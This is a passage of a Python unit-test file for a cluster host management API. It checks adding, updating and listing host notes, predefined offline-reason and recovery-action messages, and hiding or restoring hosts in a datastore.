host_note.event_time.isoformat())
# Assert PredefinedMessage entities are written into datastore.
self.assertIsNotNone(datastore_entities.PredefinedMessage.query().filter(
datastore_entities.PredefinedMessage.content ==
api_request['offline_reason']).get())
self.assertIsNotNone(datastore_entities.PredefinedMessage.query().filter(
datastore_entities.PredefinedMessage.content ==
api_request['recovery_action']).get())
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(int(host_note.id), histories[0].extra_info['host_note_id'])
mock_publish_host_note_message.assert_called_once_with(
host_note_event, common.PublishEventType.HOST_NOTE_EVENT)
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_addWithTextOfflineReasonAndRecoveryActionNoLab(
self, mock_publish_host_note_message):
"""Tests adding a non-existing host note."""
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request)
self.assertEqual('200 OK', api_response.status)
host_note = protojson.decode_message(api_messages.Note,
api_response.body)
host_note_event = api_messages.NoteEvent(note=host_note)
# Assert datastore id is generated.
self.assertIsNotNone(host_note.id)
# Assert fields equal.
self.assertEqual(api_request['hostname'], host_note.hostname)
self.assertEqual(api_request['user'], host_note.user)
self.assertEqual(api_request['message'], host_note.message)
self.assertEqual(api_request['offline_reason'], host_note.offline_reason)
self.assertEqual(api_request['recovery_action'], host_note.recovery_action)
self.assertEqual(api_request['event_time'],
host_note.event_time.isoformat())
# Assert PredefinedMessage entities are written into datastore.
self.assertIsNotNone(datastore_entities.PredefinedMessage.query().filter(
datastore_entities.PredefinedMessage.content ==
api_request['offline_reason']).get())
self.assertIsNotNone(datastore_entities.PredefinedMessage.query().filter(
datastore_entities.PredefinedMessage.content ==
api_request['recovery_action']).get())
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(int(host_note.id), histories[0].extra_info['host_note_id'])
mock_publish_host_note_message.assert_called_once_with(
host_note_event, common.PublishEventType.HOST_NOTE_EVENT)
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_updateWithTextOfflineReasonAndRecoveryAction(
self, mock_publish_host_note_message):
"""Tests updating an existing host note."""
api_request_1 = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'lab_name': 'lab-name-1',
'event_time': self.TIMESTAMP.isoformat(),
}
api_response_1 = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request_1)
self.assertEqual('200 OK', api_response_1.status)
host_note_1 = protojson.decode_message(api_messages.Note,
api_response_1.body)
new_lab_name = 'lab-name-2'
api_request_2 = {
'id': int(host_note_1.id),
'hostname': self.ndb_host_0.hostname,
'user': 'user-2',
'message': 'message-2',
'offline_reason': 'offline-reason-2',
'recovery_action': 'recovery-action-2',
'lab_name': new_lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response_2 = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request_2)
self.assertEqual('200 OK', api_response_1.status)
host_note_2 = protojson.decode_message(api_messages.Note,
api_response_2.body)
host_note_event = api_messages.NoteEvent(
note=host_note_2, lab_name=new_lab_name)
# Assert two requests modified the same datastore entity.
self.assertEqual(host_note_1.id, host_note_2.id)
# Assert the fields finally equal to the ones in the 2nd request.
self.assertEqual(api_request_2['hostname'], host_note_2.hostname)
self.assertEqual(api_request_2['user'], host_note_2.user)
self.assertEqual(api_request_2['message'], host_note_2.message)
self.assertEqual(api_request_2['offline_reason'],
host_note_2.offline_reason)
self.assertEqual(api_request_2['recovery_action'],
host_note_2.recovery_action)
self.assertEqual(api_request_2['event_time'],
host_note_2.event_time.isoformat())
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(int(host_note_1.id),
histories[0].extra_info['host_note_id'])
mock_publish_host_note_message.assert_called_with(
host_note_event, common.PublishEventType.HOST_NOTE_EVENT)
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_UpdateWithDedupTextPredefinedMessage(
self, mock_publish_host_note_message):
"""Tests updating an existing host note."""
api_request_1 = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'lab_name': 'lab-name-1',
'event_time': self.TIMESTAMP.isoformat(),
}
api_response_1 = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request_1)
self.assertEqual('200 OK', api_response_1.status)
host_note_1 = protojson.decode_message(api_messages.Note,
api_response_1.body)
api_request_2 = {
'id': int(host_note_1.id),
'hostname': self.ndb_host_0.hostname,
'user': 'user-2',
'message': 'message-2',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'lab_name': 'lab-name-1',
'event_time': self.TIMESTAMP.isoformat(),
}
api_response_2 = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request_2)
self.assertEqual('200 OK', api_response_1.status)
host_note_2 = protojson.decode_message(api_messages.Note,
api_response_2.body)
# Assert two requests modified the same datastore entity.
self.assertEqual(host_note_1.id, host_note_2.id)
# Assert the fields finally equal to the ones in the 2nd request.
self.assertEqual(api_request_2['hostname'],
host_note_2.hostname)
self.assertEqual(api_request_2['user'], host_note_2.user)
self.assertEqual(api_request_2['message'], host_note_2.message)
self.assertEqual(api_request_2['offline_reason'],
host_note_2.offline_reason)
self.assertEqual(api_request_2['recovery_action'],
host_note_2.recovery_action)
self.assertEqual(api_request_2['event_time'],
host_note_2.event_time.isoformat())
# Side Effect: Assert PredefinedMessage is created only in first call.
predefine_messages = list(datastore_entities.PredefinedMessage.query(
datastore_entities.PredefinedMessage.lab_name == 'lab-name-1').fetch())
self.assertEqual(2, len(predefine_messages))
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_addWithIdOfflineReasonAndRecoveryAction(
self, mock_publish_host_note_message):
"""Tests adding a host note with existing predefined messages."""
offline_reason = 'offline-reason'
recovery_action = 'recovery-action'
lab_name = 'lab-name'
predefined_message_entities = [
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 111),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_OFFLINE_REASON,
content=offline_reason,
used_count=2),
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 222),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_RECOVERY_ACTION,
content=recovery_action,
used_count=5),
]
offline_reason_key, recovery_action_key = ndb.put_multi(
predefined_message_entities)
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': 111,
'recovery_action_id': 222,
'lab_name': lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request)
self.assertEqual('200 OK', api_response.status)
host_note = protojson.decode_message(api_messages.Note,
api_response.body)
host_note_event = api_messages.NoteEvent(
note=host_note, lab_name=lab_name)
# Assert datastore id is generated.
self.assertIsNotNone(host_note.id)
# Assert fields equal.
self.assertEqual(api_request['hostname'], host_note.hostname)
self.assertEqual(api_request['user'], host_note.user)
self.assertEqual(api_request['message'], host_note.message)
self.assertEqual(offline_reason, host_note.offline_reason)
self.assertEqual(recovery_action, host_note.recovery_action)
self.assertEqual(api_request['event_time'],
host_note.event_time.isoformat())
# Assert PredefinedMessage used_count fields are updated.
self.assertEqual(3, offline_reason_key.get().used_count)
self.assertEqual(6, recovery_action_key.get().used_count)
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(int(host_note.id), histories[0].extra_info['host_note_id'])
mock_publish_host_note_message.assert_called_once_with(
host_note_event, common.PublishEventType.HOST_NOTE_EVENT)
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_InvalidIdOfflineReasonAndRecoveryAction(
self, mock_publish_host_note_message):
"""Tests adding a Host note with existing predefined messages."""
offline_reason = 'offline-reason'
recovery_action = 'recovery-action'
lab_name = 'lab-name'
predefined_message_entities = [
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 111),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_OFFLINE_REASON,
content=offline_reason,
used_count=2),
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 222),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_RECOVERY_ACTION,
content=recovery_action,
used_count=5),
]
ndb.put_multi(predefined_message_entities)
# Invalid recovery action.
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'recovery_action_id': 111,
'lab_name': lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote',
api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
# Non-existing offline reason.
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': 333,
'lab_name': lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote',
api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
@mock.patch.object(note_manager, 'PublishMessage')
def testBatchUpdateNotesWithPredefinedMessage(
self, mock_publish_host_note_message):
"""Tests updating notes with the same content and PredefinedMessage."""
api_request = {
'user':
'user-1',
'message':
'message-1',
'offline_reason':
'offline_reason-1',
'recovery_action':
'recovery_action-1',
'lab_name':
'lab-1',
'event_time':
self.TIMESTAMP.isoformat(),
'notes': [
{
'hostname': self.ndb_host_0.hostname,
},
{
'hostname': self.ndb_host_1.hostname,
},
{
'hostname': self.ndb_host_2.hostname,
},
],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateNotesWithPredefinedMessage',
api_request)
self.assertEqual('200 OK', api_response.status)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
note_msgs = host_note_collection_msg.notes
self.assertEqual(3, len(note_msgs))
self.assertEqual(self.ndb_host_0.hostname, note_msgs[0].hostname)
self.assertEqual(self.ndb_host_1.hostname, note_msgs[1].hostname)
self.assertEqual(self.ndb_host_2.hostname, note_msgs[2].hostname)
self.assertEqual('message-1', note_msgs[0].message)
self.assertEqual('message-1', note_msgs[1].message)
self.assertEqual('message-1', note_msgs[2].message)
self.assertEqual('user-1', note_msgs[0].user)
self.assertEqual('user-1', note_msgs[1].user)
self.assertEqual('user-1', note_msgs[2].user)
self.assertEqual('offline_reason-1', note_msgs[0].offline_reason)
self.assertEqual('offline_reason-1', note_msgs[1].offline_reason)
self.assertEqual('offline_reason-1', note_msgs[2].offline_reason)
self.assertEqual('recovery_action-1', note_msgs[0].recovery_action)
self.assertEqual('recovery_action-1', note_msgs[1].recovery_action)
self.assertEqual('recovery_action-1', note_msgs[2].recovery_action)
self.assertEqual(self.TIMESTAMP, note_msgs[0].event_time)
self.assertEqual(self.TIMESTAMP, note_msgs[1].event_time)
self.assertEqual(self.TIMESTAMP, note_msgs[2].event_time)
# Side Effect: Assert each PredefinedMessage is created only once.
offline_reasons = list(
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.lab_name == 'lab-1')
.filter(datastore_entities.PredefinedMessage.type ==
common.PredefinedMessageType.HOST_OFFLINE_REASON)
.fetch())
self.assertEqual(1, len(offline_reasons))
self.assertEqual(3, offline_reasons[0].used_count)
self.assertEqual('offline_reason-1', offline_reasons[0].content)
recovery_actions = list(
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.lab_name == 'lab-1')
.filter(datastore_entities.PredefinedMessage.type ==
common.PredefinedMessageType.HOST_RECOVERY_ACTION)
.fetch())
self.assertEqual(1, len(recovery_actions))
self.assertEqual(3, recovery_actions[0].used_count)
self.assertEqual('recovery_action-1', recovery_actions[0].content)
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[0].id),
histories[0].extra_info['host_note_id'])
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_1.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[1].id),
histories[0].extra_info['host_note_id'])
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_2.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[2].id),
histories[0].extra_info['host_note_id'])
# Side Effect: Assert host note event is published.
mock_publish_host_note_message.assert_has_calls([
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[0],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[1],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[2],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
])
@mock.patch.object(note_manager, 'PublishMessage')
def testBatchUpdateNotes_ExistingNoteAndPredefinedMessage(
self, mock_publish_host_note_message):
"""Tests updating notes with the same content and PredefinedMessage."""
existing_entities = [
datastore_entities.Note(
hostname=self.ndb_host_0.hostname,
type=common.NoteType.HOST_NOTE),
datastore_entities.PredefinedMessage(
type=common.PredefinedMessageType.HOST_OFFLINE_REASON,
content='offline_reason-1',
lab_name='lab-1',
used_count=2),
datastore_entities.PredefinedMessage(
type=common.PredefinedMessageType.HOST_RECOVERY_ACTION,
content='recovery_action-1',
lab_name='lab-1',
used_count=3),
]
keys = ndb.put_multi(existing_entities)
api_request = {
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': str(keys[1].id()),
'recovery_action_id': str(keys[2].id()),
'lab_name': 'lab-1',
'notes': [
{
'id': str(keys[0].id()),
},
{
'hostname': self.ndb_host_1.hostname,
},
{
'hostname': self.ndb_host_2.hostname,
},
],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateNotesWithPredefinedMessage',
api_request)
self.assertEqual('200 OK', api_response.status)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
note_msgs = host_note_collection_msg.notes
self.assertEqual(3, len(note_msgs))
self.assertEqual(self.ndb_host_0.hostname, note_msgs[0].hostname)
self.assertEqual(self.ndb_host_1.hostname, note_msgs[1].hostname)
self.assertEqual(self.ndb_host_2.hostname, note_msgs[2].hostname)
self.assertEqual('message-1', note_msgs[0].message)
self.assertEqual('message-1', note_msgs[1].message)
self.assertEqual('message-1', note_msgs[2].message)
self.assertEqual('user-1', note_msgs[0].user)
self.assertEqual('user-1', note_msgs[1].user)
self.assertEqual('user-1', note_msgs[2].user)
self.assertEqual('offline_reason-1', note_msgs[0].offline_reason)
self.assertEqual('offline_reason-1', note_msgs[1].offline_reason)
self.assertEqual('offline_reason-1', note_msgs[2].offline_reason)
self.assertEqual('recovery_action-1', note_msgs[0].recovery_action)
self.assertEqual('recovery_action-1', note_msgs[1].recovery_action)
self.assertEqual('recovery_action-1', note_msgs[2].recovery_action)
# Side Effect: Assert each PredefinedMessage is created only once.
offline_reasons = list(
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.lab_name == 'lab-1')
.filter(datastore_entities.PredefinedMessage.type ==
common.PredefinedMessageType.HOST_OFFLINE_REASON)
.fetch())
self.assertEqual(1, len(offline_reasons))
self.assertEqual(5, offline_reasons[0].used_count)
self.assertEqual('offline_reason-1', offline_reasons[0].content)
recovery_actions = list(
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.lab_name == 'lab-1')
.filter(datastore_entities.PredefinedMessage.type ==
common.PredefinedMessageType.HOST_RECOVERY_ACTION)
.fetch())
self.assertEqual(1, len(recovery_actions))
self.assertEqual(6, recovery_actions[0].used_count)
self.assertEqual('recovery_action-1', recovery_actions[0].content)
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(0, len(histories))
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_1.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[1].id),
histories[0].extra_info['host_note_id'])
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_2.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(
int(host_note_collection_msg.notes[2].id),
histories[0].extra_info['host_note_id'])
# Side Effect: Assert host note event is published.
mock_publish_host_note_message.assert_has_calls([
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[0],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[1],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
mock.call(
api_messages.NoteEvent(
note=host_note_collection_msg.notes[2],
lab_name='lab-1'),
common.PublishEventType.HOST_NOTE_EVENT),
])
def testBatchUpdateNotes_InvalidPredefinedMessages(self):
"""Tests updating notes with the same content and PredefinedMessage."""
offline_reason = 'offline-reason'
recovery_action = 'recovery-action'
lab_name = 'lab-name'
existing_entities = [
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 111),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_OFFLINE_REASON,
content=offline_reason,
used_count=2),
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 222),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_RECOVERY_ACTION,
content=recovery_action,
used_count=5),
]
ndb.put_multi(existing_entities)
# invalid recovery action
api_request = {
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': '111',
'recovery_action_id': '444',
'notes': [
{
'hostname': self.ndb_host_0.hostname,
},
{
'hostname': self.ndb_host_1.hostname,
},
{
'hostname': self.ndb_host_2.hostname,
},
],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateNotesWithPredefinedMessage',
api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
# invalid offline reason
api_request = {
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': '333',
'recovery_action_id': '222',
'notes': [
{
'hostname': self.ndb_host_0.hostname,
},
{
'hostname': self.ndb_host_1.hostname,
},
{
'hostname': self.ndb_host_2.hostname,
},
],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateNotesWithPredefinedMessage',
api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
def testGetHost(self):
"""Tests GetHost."""
api_request = {'hostname': self.ndb_host_0.hostname}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(1, len(host.device_infos))
self.assertEqual(self.ndb_device_1.device_serial,
host.device_infos[0].device_serial)
self.assertEqual(0, len(host.notes))
def testGetHost_noDevices(self):
"""Tests GetHost when a host has no devices."""
api_request = {'hostname': self.ndb_host_2.hostname}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_2, host)
self.assertEqual(0, len(host.device_infos))
def testGetHost_includeHidden(self):
"""Tests GetHost including hidden devices."""
api_request = {'hostname': self.ndb_host_0.hostname, 'include_hidden': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(2, len(host.device_infos))
self.assertItemsEqual(['device_0', 'device_1'],
[d.device_serial for d in host.device_infos])
self.assertEqual(0, len(host.notes))
def testGetHost_includeNotes(self):
"""Tests GetHost including notes when they are available."""
api_request = {'hostname': self.ndb_host_0.hostname, 'include_notes': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(1, len(host.notes))
self.assertEqual(self.note.user, host.notes[0].user)
self.assertEqual(self.note.timestamp, host.notes[0].timestamp)
self.assertEqual(self.note.message, host.notes[0].message)
def testGetHost_includeNotesNoneAvailable(self):
"""Tests GetHost including notes when none are available."""
api_request = {'hostname': self.ndb_host_1.hostname, 'include_notes': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_1, host)
self.assertEqual(0, len(host.notes))
def testGetHost_includeHistoryState(self):
"""Tests GetHost including state history."""
timestamp1 = datetime.datetime(2015, 10, 9, 1)
timestamp2 = datetime.datetime(2015, 10, 9, 2)
state1 = api_messages.HostState.RUNNING
state2 = api_messages.HostState.GONE
history_key1 = ndb.Key(
datastore_entities.HostStateHistory,
self.ndb_host_1.hostname + str(timestamp1),
parent=self.ndb_host_1.key)
ndb_host_1_state_history1 = datastore_entities.HostStateHistory(
key=history_key1,
hostname=self.ndb_host_1.hostname,
timestamp=timestamp1,
state=state1)
ndb_host_1_state_history1.put()
history_key2 = ndb.Key(
datastore_entities.HostStateHistory,
self.ndb_host_1.hostname + str(timestamp2),
parent=self.ndb_host_1.key)
ndb_host_1_state_history2 = datastore_entities.HostStateHistory(
key=history_key2,
hostname=self.ndb_host_1.hostname,
timestamp=timestamp2,
state=state2)
ndb_host_1_state_history2.put()
api_request = {
'hostname': self.ndb_host_1.hostname,
'include_host_state_history': True
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.AssertEqualHostInfo(self.ndb_host_1, host)
self.assertEqual(2, len(host.state_history))
self.assertEqual(host.state_history[0].state, state2.name)
self.assertEqual(host.state_history[0].timestamp, timestamp2)
self.assertEqual(host.state_history[1].state, state1.name)
self.assertEqual(host.state_history[1].timestamp, timestamp1)
def testGetHost_includeUpdateState(self):
"""Test GetHost includeing update state."""
display_message = 'Some host update display message for syncing.'
datastore_test_util.CreateHostUpdateState(
self.ndb_host_0.hostname, state=api_messages.HostUpdateState.SYNCING,
display_message=display_message)
api_request = {
'hostname': self.ndb_host_0.hostname,
'include_host_state_history': True
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(self.ndb_host_0.hostname, host.hostname)
self.assertEqual('SYNCING', host.update_state)
self.assertEqual(display_message, host.update_state_display_message)
def testNewNote_withNoneExisting(self):
"""Tests adding a note to a host when none exist already."""
user = 'some_user'
timestamp = datetime.datetime(2015, 10, 18, 20, 46)
message = 'The Message'
offline_reason = 'Wires are disconnected'
recovery_action = 'Press a button'
api_request = {
'hostname': self.ndb_host_1.hostname,
'user': user,
'timestamp': timestamp.isoformat(),
'message': message,
'offline_reason': offline_reason,
'recovery_action': recovery_action,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.NewNote',
api_request)
self.assertEqual('200 OK', api_response.status)
api_request = {'hostname': self.ndb_host_1.hostname, 'include_notes': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual(1, len(host.notes))
self.assertEqual(user, host.notes[0].user)
self.assertEqual(timestamp, host.notes[0].timestamp)
self.assertEqual(message, host.notes[0].message)
self.assertEqual(offline_reason, host.notes[0].offline_reason)
self.assertEqual(recovery_action, host.notes[0].recovery_action)
def testNewNote_withExisting(self):
"""Tests adding a note to a host when one already exists."""
user = 'some_user'
timestamp = datetime.datetime(2015, 10, 18, 20, 46)
message = 'The Message'
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': user,
'timestamp': timestamp.isoformat(),
'message': message
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.NewNote',
api_request)
self.assertEqual('200 OK', api_response.status)
# Query the same host again. Notes should be sorted.
api_request = {'hostname': self.ndb_host_0.hostname, 'include_notes': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertEqual(2, len(host.notes))
self.assertEqual(user, host.notes[0].user)
self.assertEqual(timestamp, host.notes[0].timestamp)
self.assertEqual(message, host.notes[0].message)
self.assertEqual(self.note.user, host.notes[1].user)
self.assertEqual(self.note.timestamp, host.notes[1].timestamp)
self.assertEqual(self.note.message, host.notes[1].message)
def testRemove(self):
"""Tests Remove."""
# Check that the existing host is not set to hidden
api_request = {'hostname': self.ndb_host_0.hostname}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertFalse(host.hidden)
# Call Remove
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.Remove',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
# Verify API response
self.assertEqual('200 OK', api_response.status)
self.assertTrue(host.hidden)
# Verify by retrieving the host
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertTrue(host.hidden)
for device in host.device_infos:
# hide a host will also hide all devices.
self.assertTrue(device.hidden)
def testRemove_missingHost(self):
"""Test Remove with an invalid hostname."""
api_request = {'hostname': 'some-fake-hostname'}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.Remove', api_request, expect_errors=True)
self.assertEqual('404 Not Found', api_response.status)
def testRestore(self):
"""Tests Restore."""
# Check that the existing host is set to hidden
api_request = {'hostname': self.ndb_host_1.hostname}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertTrue(host.hidden)
# Call Remove
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.Restore',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
# Verify API response
self.assertEqual('200 OK', api_response.status)
self.assertFalse(host.hidden)
# Verify by retrieving the host
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.GetHost',
api_request)
host = protojson.decode_message(api_messages.HostInfo, api_response.body)
self.assertFalse(host.hidden)
for device in host.device_infos:
# restore a host will not restore devices under the host.
self.assertTrue(device.hidden)
def testRestore_missingHost(self):
"""Test Remove with an invalid hostname."""
api_request = {'hostname': 'some-fake-hostname'}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.Restore', api_request, expect_errors=True)
self.assertEqual('404 Not Found', api_response.status)
def testListHostNotes(self):
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_2',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
ndb.put_multi(note_entities)
# The result will be sorted by timestamp in descending order. `
api_request = {
'hostname': 'host_1',
'count': 2,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
self.assertTrue(host_note_collection_msg.more)
self.assertIsNotNone(host_note_collection_msg.next_cursor)
